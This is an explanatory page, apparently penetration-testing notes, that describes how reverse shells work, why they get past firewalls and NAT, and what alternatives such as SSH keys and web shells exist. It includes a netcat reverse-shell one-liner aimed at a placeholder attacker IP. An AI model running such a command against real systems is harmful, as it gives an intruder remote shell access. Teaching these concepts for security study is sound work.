As opposed to a bind shell, a reverse shell works in the opposite manner, with the attacker machine listening instead of the target machine. A reverse shell is defined as the following:
- The attacker machine listens on a local port.
- The target machine connects to the attacker, sending an interactive shell with it.
Or more briefly: the remote connects to your host, sending a shell
Advantage over bind shell
Reverse shells are often more widely used for the penetration stage than bind shells due to their ability to bypass basic firewalls. It is easier to send a request than to listen on a port, since firewalls tend to not restrict outbound traffic. Plus, reverse shells get around NAT on the remote host.
An example of reverse shell with netcat:
# Attacker
nc -lvp $PORT
# Target
nc $ATTACKER_IP $PORT -e $SHELLNAT on attacking host?
When the attacking host is behind a NAT (and you don’t have access to a public IP / port forward / VPS, etc) and not on the same LAN as the remote host, reverse shells might not be viable, but you can use other methods such as dropping a SSH key, web shell, etc.